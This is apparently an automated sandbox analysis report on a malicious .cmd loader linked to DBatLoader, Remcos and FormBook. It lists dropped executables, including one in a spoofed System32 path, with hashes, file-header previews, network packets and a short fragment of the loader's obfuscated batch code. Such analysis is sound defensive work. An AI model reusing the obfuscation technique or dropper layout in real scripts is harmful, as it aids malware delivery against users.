        oKRfguHBrN.xlsGet hashmaliciousUnknownBrowse
        • 13.107.137.11

        Dropped Files

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Users\Public\alpha.exeContact Form and Delivery Details ,pdf.cmdGet hashmaliciousDBatLoader, FormBookBrowse
          Duclot Collections.batGet hashmaliciousRemcos, DBatLoaderBrowse
            GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
              Factura_pdf.batGet hashmaliciousUnknownBrowse
                Julcbozqsvtzlo.cmdGet hashmaliciousRemcos, AveMaria, DBatLoader, PrivateLoader, UACMeBrowse
                  Justificante66a20daf29a24e355ccad8f0_pdf.cmdGet hashmaliciousUnknownBrowse
                    PO#38595.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                      a5wqh2pM1I.batGet hashmaliciousRemcos, DBatLoaderBrowse
                        out.cmdGet hashmaliciousUnknownBrowse
                          ZG7UaFRPVW.exeGet hashmaliciousDBatLoader, RemcosBrowse

                            Created / dropped Files

                            C:\Users\Public\Libraries\Ping_c.pif

                            Download File
                            Process:C:\Users\Public\kn.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):1443840
                            Entropy (8bit):7.102818051572477
                            Encrypted:false
                            SSDEEP:24576:h4QdcyXLJzOXVbl/41acOSYrkjX/Mv4L2z3/7zXedU+rcuDYm+7etOY7OhWP6PZA:CQ/yF41acOSrYvZzv8+fm+7etlWWP4CZ
                            MD5:66561F313D11178EEE1955CE46E4CEA0
                            SHA1:444D82C1C419550F87BC1FBAE9F17C1D3C721150
                            SHA-256:770D0168D1E6A0033C6908A28B61238F710901E860E7720FF74DF8CBE405A24E
                            SHA-512:223C89A55CDDEF9A02356594FA8B8C8FCC589E70FF470E0772BC9347CC2F78F7FE311BFCC8E8BA0928A7B38893170170E45AE9DAD8BDEEF946ED53C99E666A88
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................(....................@..............................................@..............................x&...........................`...j...........................P.......................................................text............................... ..`.itext...<.......<.................. ..`.data...L...........................@....bss.....6...............................idata..x&.......(..................@....tls....4....@...........................rdata.......P......................@..@.reloc...j...`...l..................@..B.rsrc................J..............@..@....................................@..@................................................................................................

                            C:\Users\Public\Ping_c.mp4

                            Download File
                            Process:C:\Users\Public\kn.exe
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:dropped
                            Size (bytes):2887682
                            Entropy (8bit):3.8112357092177813
                            Encrypted:false
                            SSDEEP:24576:UIjMKEr6BetTyfzJjCa3RWakbq9Pjmw5i2FE2Ms6DOl4JG3vlfzurxTQL:R
                            MD5:C698DBA48A839EF3B603F6C76A90B500
                            SHA1:C5E761F45F0267F3DA17BF86A1305E06B65166FB
                            SHA-256:749AA65A2AA65AA1BBBF3E0E294C601CD286D5613EE8C2DA9794AFA7124D318D
                            SHA-512:AB0831DCA89CCFB0BC861E099912EE45A2B405E7132A293776F4702C664109B7F411A70EB1D4AD65662D4A45D33B1C7D81CE41C0482F4799EE1BE1F984BEE219
                            Malicious:false
                            Preview:4d5a50000200000004000f00ffff0000b80000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ba10000e1fb409cd21b8014ccd219090546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a243700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004c010900195e422a0000000000000000e0008e810b01021900dc05000028100000000000b8eb05000010000000f0050000004000001000000002000004000000000000000400000000000000009016000004000000000000020000000000100000400000000010000010000000000000100000000000000000000000001014007826000000d0140000be01000000000000000000000000000000000000601400946a000000000000000000000000000000000000000000000000000000501400180000000000000000000000000000000000000010171400f80500000000000000000000000000000000000000000000

                            C:\Users\Public\alpha.exe

                            Download File
                            Process:C:\Windows\System32\extrac32.exe
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:modified
                            Size (bytes):289792
                            Entropy (8bit):6.135598950357573
                            Encrypted:false
                            SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                            MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                            SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                            SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                            SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Joe Sandbox View:
                            • Filename: Contact Form and Delivery Details ,pdf.cmd, Detection: malicious, Browse
                            • Filename: Duclot Collections.bat, Detection: malicious, Browse
                            • Filename: GestionPagoAProveedores_100920241725998901306_PDF.cmd, Detection: malicious, Browse
                            • Filename: Factura_pdf.bat, Detection: malicious, Browse
                            • Filename: Julcbozqsvtzlo.cmd, Detection: malicious, Browse
                            • Filename: Justificante66a20daf29a24e355ccad8f0_pdf.cmd, Detection: malicious, Browse
                            • Filename: PO#38595.cmd, Detection: malicious, Browse
                            • Filename: a5wqh2pM1I.bat, Detection: malicious, Browse
                            • Filename: out.cmd, Detection: malicious, Browse
                            • Filename: ZG7UaFRPVW.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................

                            C:\Users\Public\ger.exe

                            Download File
                            Process:C:\Windows\System32\extrac32.exe
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:modified
                            Size (bytes):77312
                            Entropy (8bit):5.996265028984654
                            Encrypted:false
                            SSDEEP:1536:/ZsKjopjN/cYXsuMdCAOznsA5q+oxxhRO+sAg9RyTVZiJXpnvo/vrK:FW5nspdCbzpq+iLcqjWXpvo/vm
                            MD5:227F63E1D9008B36BDBCC4B397780BE4
                            SHA1:C0DB341DEFA8EF40C03ED769A9001D600E0F4DAE
                            SHA-256:C0E25B1F9B22DE445298C1E96DDFCEAD265CA030FA6626F61A4A4786CC4A3B7D
                            SHA-512:101907B994D828C83587C483B4984F36CAF728B766CB7A417B549852A6207E2A3FE9EDC8EFF5EEAB13E32C4CF1417A3ADCCC089023114EA81974C5E6B355FED9
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................................................r.........Rich............PE..d....6<..........."..........N.................@.............................p......@.....`.......... ..........................................D....P.......@..,............`..D.......T...........................0...............H...x............................text...p........................... ..`.rdata..(........0..................@..@.data...(....0......................@....pdata..,....@......................@..@.rsrc........P.......$..............@..@.reloc..D....`.......,..............@..B........................................................................................................................................................................................................................................................................

                            C:\Users\Public\kn.exe

                            Download File
                            Process:C:\Windows\System32\extrac32.exe
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:modified
                            Size (bytes):1651712
                            Entropy (8bit):6.144018815244304
                            Encrypted:false
                            SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                            MD5:F17616EC0522FC5633151F7CAA278CAA
                            SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                            SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                            SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................

                            C:\Users\Public\xkn.exe

                            Download File
                            Process:C:\Windows\System32\extrac32.exe
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:modified
                            Size (bytes):452608
                            Entropy (8bit):5.459268466661775
                            Encrypted:false
                            SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
                            MD5:04029E121A0CFA5991749937DD22A1D9
                            SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                            SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                            SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xkn.exe.log

                            Download File
                            Process:C:\Users\Public\xkn.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):2667
                            Entropy (8bit):5.3546132390144345
                            Encrypted:false
                            SSDEEP:48:MxHKQwYHKGSI6o6+ztYsTzHNpDHmAHKKkWHKmHKe6ftHTHq+0trK7mHKwl9:iqbYqGSI6o9xYsntpDxqKkWqmq1ftzHK
                            MD5:A477C52686412872F51E6EADC0EE00E8
                            SHA1:97AF03D2CD45488E73DCB72720F6EB704DB687B6
                            SHA-256:9478FEA68BD400729D6132BC0D47527BE473E45F64C17C4568F655C188EA3C6A
                            SHA-512:BF00A82630532385C5A9E1C7B2B95C6E09AB671E8D59A9129837A763F9A44C654ACE578F15F27A4FEF1CB01A800FAB850A6FAD85272ABB26EFA87442F320A52A
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\0827b790b8e74d0d12643297a812ae07\Microsoft.PowerShell.ConsoleHost.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d5

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Users\Public\xkn.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):0.7307872139132228
                            Encrypted:false
                            SSDEEP:3:NlllulkX:NllU
                            MD5:C71A2ECB2F33053E0001F23F1C13DF8F
                            SHA1:DCC5DA2329F5481EE748DBCCC346E06BD6F4F843
                            SHA-256:A122EDC09F664F32F7A906B2F7E8C4E4AAEA97CCF7BC231F6B9D0612BEBBD3C8
                            SHA-512:C0EDCEF10A013F12C981F2B078996948E8B698D8AC2C37DC9566C3C2A25B0E56D5EE7B27C4BD8519414BD15251F94F66418D35B67A23D6875AABD35B19E1CD5F
                            Malicious:false
                            Preview:@...e...........................................................

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bn2pj5vw.o5d.psm1

                            Download File
                            Process:C:\Users\Public\xkn.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suyjvk0i.1uq.ps1

                            Download File
                            Process:C:\Users\Public\xkn.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Windows \System32\per.exe

                            Download File
                            Process:C:\Windows\System32\extrac32.exe
                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                            Category:modified
                            Size (bytes):49664
                            Entropy (8bit):5.876977574715819
                            Encrypted:false
                            SSDEEP:768:WwU7bDT2KLt6oPjQQ5fxGIjN44MgZkD9TpiPogpUORaNpohsySZlv7:WtfT2KwoPBxjN4zDbgpUOoo1SZ17
                            MD5:85018BE1FD913656BC9FF541F017EACD
                            SHA1:26D7407931B713E0F0FA8B872FEECDB3CF49065A
                            SHA-256:C546E05D705FFDD5E1E18D40E2E7397F186A7C47FA5FC21F234222D057227CF5
                            SHA-512:3E5903CF18386951C015AE23DD68A112B2F4B0968212323218C49F8413B6D508283CC6AAA929DBEAD853BD100ADC18BF497479963DAD42DFAFBEB081C9035459
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 3%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.-.=.C.=.C.=.C.4...#.C.).F.<.C.).@.?.C.).G.).C.).B.6.C.=.B.O.C.).K.;.C.)..<.C.).A.<.C.Rich=.C.........................PE..d....*}..........."..........D......`..........@............................. ....................... ..........................................h...............X.......................T........................... ...............8................................text.............................. ..`.imrsiv..................................rdata..2&.......(..................@..@.data...............................@....pdata..X...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................

                            \Device\Null

                            Download File
                            Process:C:\Users\Public\alpha.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):104
                            Entropy (8bit):4.403504238247217
                            Encrypted:false
                            SSDEEP:3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
                            MD5:E14D0D771A7FEB9D78EA3DCA9197BA2A
                            SHA1:48E363AAD601D9073D803AA9D224BF9A7FC39119
                            SHA-256:0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
                            SHA-512:3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
                            Malicious:false
                            Preview:The system cannot find message text for message number 0x400023a1 in the message file for Application...

                            Static File Info

                            General

                            File type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                            Entropy (8bit):5.057273197369434
                            TrID:
                            • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                            • MP3 audio (1001/1) 33.33%
                            File name:rPO767575.cmd
                            File size:4'230'931 bytes
                            MD5:5e052709f9e7b0b0ea90de7b99b8cc43
                            SHA1:88c7a864f7329bddc022736ab869708792e3dd91
                            SHA256:1f4f6c2f96f8ceae07c5abfa215a95a6788ec2e74c6a941c94c54dbca211ba69
                            SHA512:990057b8ad8e1a634ec3c356da52824cf2f5729abd741206a29473e977d7d6653eba3a5b71b02959219e4c54e26c0170b8702f901e0d137694ba4ddeed76e03d
                            SSDEEP:49152:lMH/Q/3P21wHyBJFqQ6WebrGkL+gc0GZNPXdgSDA8Sqnk43iMmWH3pjr2+:s
                            TLSH:E61695E73BBD13CE930537CB8BCFE6258E57CC6946D26EC453C32998155E20B28E095A
                            File Content Preview:..&@cls&@set "_..=YaVkEdUGFuMb@INBoR24w368c91Zfxt5TP CqlWKLOngSDzis0rmQjyeJHhXp7Av"..%_..:~12,1%%_..:~48,1%%_..:~55,1%%_..:~30,1%%_..:~34,1%"_..=%_..:~46,1%%_..:~21,1%%_..:~19,1%%_..:~22,1%%_..:~38,1%%_..:~60,1%%.......%%_..:~54,1%%_..:~15,1%%_..:~17,1%%_

                            File Icon

                            Icon Hash:9686878b929a9886

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 21, 2024 16:22:18.572237968 CEST49707443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:18.572278976 CEST4434970713.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:18.572352886 CEST49707443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:18.572463036 CEST49707443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:18.572540045 CEST4434970713.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:18.573335886 CEST49707443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:18.600332975 CEST49708443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:18.600380898 CEST4434970813.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:18.600456953 CEST49708443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:18.605215073 CEST49708443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:18.605256081 CEST4434970813.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:19.193180084 CEST4434970813.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:19.193295002 CEST49708443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:19.238953114 CEST49708443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:19.238996983 CEST4434970813.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:19.239445925 CEST4434970813.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:19.302347898 CEST49708443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:19.421588898 CEST49708443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:19.467406988 CEST4434970813.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:19.936491013 CEST4434970813.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:19.936714888 CEST4434970813.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:19.936817884 CEST49708443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:19.939058065 CEST49708443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:19.939075947 CEST4434970813.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:19.939315081 CEST49708443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:19.939320087 CEST4434970813.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:21.823474884 CEST49712443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:21.823518991 CEST4434971213.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:21.823611975 CEST49712443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:21.839814901 CEST49712443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:21.839860916 CEST4434971213.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:21.839971066 CEST49712443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:22.002824068 CEST49713443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:22.002958059 CEST4434971313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:22.003081083 CEST49713443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:22.004147053 CEST49713443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:22.004178047 CEST4434971313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:23.245481968 CEST4434971313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:23.245589018 CEST49713443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:23.248193026 CEST49713443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:23.248224974 CEST4434971313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:23.248450994 CEST4434971313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:23.249749899 CEST49713443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:23.291419029 CEST4434971313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:23.946540117 CEST4434971313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:23.966633081 CEST4434971313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:23.966717005 CEST49713443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:23.966852903 CEST49713443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:23.966902018 CEST4434971313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:23.966932058 CEST49713443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:23.966948032 CEST4434971313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:25.961045980 CEST49719443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:25.961097956 CEST4434971913.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:25.961189985 CEST49719443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:25.962510109 CEST49719443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:25.962549925 CEST4434971913.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:25.962605953 CEST49719443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:26.135355949 CEST49720443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:26.135411024 CEST4434972013.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:26.135560036 CEST49720443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:26.135992050 CEST49720443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:26.136007071 CEST4434972013.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:27.085022926 CEST4434972013.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:27.085103035 CEST49720443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:27.086864948 CEST49720443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:27.086893082 CEST4434972013.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:27.087105036 CEST4434972013.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:27.094883919 CEST49720443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:27.135409117 CEST4434972013.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:27.680274010 CEST4434972013.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:27.682100058 CEST4434972013.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:27.682169914 CEST49720443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:27.682275057 CEST49720443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:27.682297945 CEST4434972013.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:27.682315111 CEST49720443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:27.682322025 CEST4434972013.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:29.946799994 CEST49722443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:29.946898937 CEST4434972213.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:29.947036982 CEST49722443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:29.947154045 CEST49722443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:29.947231054 CEST4434972213.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:29.947294950 CEST49722443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:29.997328043 CEST49723443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:29.997374058 CEST4434972313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:29.997607946 CEST49723443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:29.998018980 CEST49723443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:29.998039007 CEST4434972313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:30.682171106 CEST4434972313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:30.682235956 CEST49723443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:30.684295893 CEST49723443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:30.684314966 CEST4434972313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:30.684533119 CEST4434972313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:30.686033010 CEST49723443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:30.731404066 CEST4434972313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:31.289412022 CEST4434972313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:31.292354107 CEST4434972313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:31.292407990 CEST49723443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:31.292545080 CEST49723443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:31.292572975 CEST4434972313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:31.292586088 CEST49723443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:31.292593002 CEST4434972313.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:33.262454033 CEST49725443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:33.262552023 CEST4434972513.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:33.262686014 CEST49725443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:33.262794971 CEST49725443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:33.262916088 CEST4434972513.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:33.263009071 CEST49725443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:33.323810101 CEST49726443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:33.323903084 CEST4434972613.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:33.324023008 CEST49726443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:33.324369907 CEST49726443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:33.324409962 CEST4434972613.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:34.106409073 CEST4434972613.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:34.106559038 CEST49726443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:34.108398914 CEST49726443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:34.108416080 CEST4434972613.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:34.108942032 CEST4434972613.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:34.110174894 CEST49726443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:34.155399084 CEST4434972613.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:34.722261906 CEST4434972613.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:34.722879887 CEST4434972613.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:34.722951889 CEST49726443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:34.910315037 CEST49726443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:34.910362959 CEST4434972613.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:34.910382986 CEST49726443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:34.910392046 CEST4434972613.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:37.033955097 CEST49728443192.168.2.813.107.137.11
                            Sep 21, 2024 16:22:37.034006119 CEST4434972813.107.137.11192.168.2.8
                            Sep 21, 2024 16:22:37.034084082 CEST49728443192.168.2.813.107.137.11
